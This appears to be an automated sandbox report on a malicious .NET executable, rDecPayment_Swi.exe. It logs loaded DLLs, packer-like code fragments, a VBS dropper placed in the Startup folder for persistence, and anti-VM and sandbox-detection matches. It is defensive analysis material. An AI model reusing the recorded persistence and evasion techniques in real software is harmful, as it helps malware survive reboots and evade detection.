              Source: classification engineClassification label: mal100.expl.evad.winEXE@4/3@1/1
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CerberusInstall64.vbsJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMutant created: NULL
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6564:64:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\cd3517a6-dd64-4d22-b1d9-3097edb922b6Jump to behavior
              Source: rDecPayment_Swi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: rDecPayment_Swi.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: rDecPayment_Swi.exeReversingLabs: Detection: 21%
              Source: rDecPayment_Swi.exeVirustotal: Detection: 26%
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeFile read: C:\Users\user\Desktop\rDecPayment_Swi.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\rDecPayment_Swi.exe "C:\Users\user\Desktop\rDecPayment_Swi.exe"
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess created: C:\Users\user\Desktop\rDecPayment_Swi.exe "C:\Users\user\Desktop\rDecPayment_Swi.exe"
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1168
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess created: C:\Users\user\Desktop\rDecPayment_Swi.exe "C:\Users\user\Desktop\rDecPayment_Swi.exe"Jump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: rDecPayment_Swi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: rDecPayment_Swi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: %%.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266395059.00000000009E8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbQ! source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003E68000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335872800.0000000006170000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266395059.00000000009E8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003E68000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335872800.0000000006170000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb8 source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb8 source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbWi source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbw8 source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3269937198.0000000005320000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbroU source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000E89000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 0.2.rDecPayment_Swi.exe.42bfa08.2.raw.unpack, AdjustableCache.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.rDecPayment_Swi.exe.3d55cc8.2.raw.unpack, aMgBSjgwbM2HYxLf2nT.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 3.2.rDecPayment_Swi.exe.3df5ce8.3.raw.unpack, aMgBSjgwbM2HYxLf2nT.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              .NET source code contains potential unpacker
              Source: 0.2.rDecPayment_Swi.exe.6060000.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 0.2.rDecPayment_Swi.exe.6060000.5.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 0.2.rDecPayment_Swi.exe.6060000.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 0.2.rDecPayment_Swi.exe.6060000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 0.2.rDecPayment_Swi.exe.6060000.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 0.2.rDecPayment_Swi.exe.5e60000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2335054364.0000000005E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: rDecPayment_Swi.exe PID: 5064, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: rDecPayment_Swi.exe PID: 5280, type: MEMORYSTR
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05C15831 push 00000028h; retf 0_2_05C1584A
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05C153C5 push 00000028h; retf 0_2_05C153C7
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05C15784 push 00000028h; retf 0_2_05C1578C
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05C15347 push 00000028h; retf 0_2_05C15351
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_01165891 push edx; retf 0_2_01165894
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E3D67F push 8B05E3DBh; iretd 0_2_05E3D68A
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E5109D push BA010D89h; ret 0_2_05E510A2
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E5BB4D push edi; ret 0_2_05E5BB53
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E50327 push BA010D89h; retn 0002h0_2_05E5032C
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060D5F79 pushfd ; ret 0_2_060D5F85
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060DF0FF push es; retf 0_2_060DF108
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060FD557 push edi; iretd 0_2_060FD55D
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060F2D4F push esp; ret 0_2_060F2D50
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_06210007 pushad ; iretd 0_2_06210035
              Source: 3.2.rDecPayment_Swi.exe.3d55cc8.2.raw.unpack, D09Y1p2jSSpclmWmwvl.csHigh entropy of concatenated method names: 'OE62dH7YXb', 'Aoi2bYeNc3', 'F7Q2qLP5A4', 'iMj2vRZjK3', 'JcS2Wpscd2', 'Fsa2YZOqJI', 's4O2lOJVG6', 'Cx72pujh7K', 'Xbo24H4W3T', 'RWY2GiqSkF'
              Source: 3.2.rDecPayment_Swi.exe.3d55cc8.2.raw.unpack, KRQQjt2ZSuWxyGdllPV.csHigh entropy of concatenated method names: 'GZUqb5ay8r', 'SBjqqJ6NMY', 'lZpqvtibCO', 'N4QqWIjGy5', 'Kc1qY3B17F', 'a5OqlAcIdO', 'Aw0qpgxPKi', 'gZJ2xfE8Z5', 'j2rq4LxFFE', 'iLcqGt3von'
              Source: 3.2.rDecPayment_Swi.exe.3d55cc8.2.raw.unpack, iSR1Dpugbf025Aco0K.csHigh entropy of concatenated method names: 'gLM5csIDc', 'MkuxpCeFB', 'VXLM9U2xm', 'QtF1d1U6o', 'CwmBUV3Jt', 'thiefTxwx', 'oQjcXkkmg', 'bSYyKdyLn', 'vN6K7CHa6', 'BKULTZGYjHc0eI9J7Eg'
              Source: 3.2.rDecPayment_Swi.exe.3d55cc8.2.raw.unpack, aMgBSjgwbM2HYxLf2nT.csHigh entropy of concatenated method names: 'p5xoAS3by9KVFZVMJYY', 'cJ8vEB3qB5EUBMBeXxw', 'z7yJEIccrK', 'vh0ry9Sq2v', 'DxbJuXupbq', 'hOHJtka8VF', 'vJ1J5j0rii', 'UQ0Jxj6p3d', 'bUhAbXQoal', 'XJugghlwTA'
              Source: 3.2.rDecPayment_Swi.exe.3df5ce8.3.raw.unpack, D09Y1p2jSSpclmWmwvl.csHigh entropy of concatenated method names: 'OE62dH7YXb', 'Aoi2bYeNc3', 'F7Q2qLP5A4', 'iMj2vRZjK3', 'JcS2Wpscd2', 'Fsa2YZOqJI', 's4O2lOJVG6', 'Cx72pujh7K', 'Xbo24H4W3T', 'RWY2GiqSkF'
              Source: 3.2.rDecPayment_Swi.exe.3df5ce8.3.raw.unpack, KRQQjt2ZSuWxyGdllPV.csHigh entropy of concatenated method names: 'GZUqb5ay8r', 'SBjqqJ6NMY', 'lZpqvtibCO', 'N4QqWIjGy5', 'Kc1qY3B17F', 'a5OqlAcIdO', 'Aw0qpgxPKi', 'gZJ2xfE8Z5', 'j2rq4LxFFE', 'iLcqGt3von'
              Source: 3.2.rDecPayment_Swi.exe.3df5ce8.3.raw.unpack, iSR1Dpugbf025Aco0K.csHigh entropy of concatenated method names: 'gLM5csIDc', 'MkuxpCeFB', 'VXLM9U2xm', 'QtF1d1U6o', 'CwmBUV3Jt', 'thiefTxwx', 'oQjcXkkmg', 'bSYyKdyLn', 'vN6K7CHa6', 'BKULTZGYjHc0eI9J7Eg'
              Source: 3.2.rDecPayment_Swi.exe.3df5ce8.3.raw.unpack, aMgBSjgwbM2HYxLf2nT.csHigh entropy of concatenated method names: 'p5xoAS3by9KVFZVMJYY', 'cJ8vEB3qB5EUBMBeXxw', 'z7yJEIccrK', 'vh0ry9Sq2v', 'DxbJuXupbq', 'hOHJtka8VF', 'vJ1J5j0rii', 'UQ0Jxj6p3d', 'bUhAbXQoal', 'XJugghlwTA'
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeFile created: C:\Users\user\AppData\Local\CerberusInstall64.exeJump to dropped file

              Boot Survival

              barindex
              Drops VBS files to the startup folder
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CerberusInstall64.vbsJump to dropped file
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CerberusInstall64.vbsJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CerberusInstall64.vbsJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Yara detected AntiVM3
              Source: Yara matchFile source: Process Memory Space: rDecPayment_Swi.exe PID: 5064, type: MEMORYSTR
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMemory allocated: 1160000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMemory allocated: 2E60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeMemory allocated: 2D70000 memory reserve | memory write watchJump to behavior
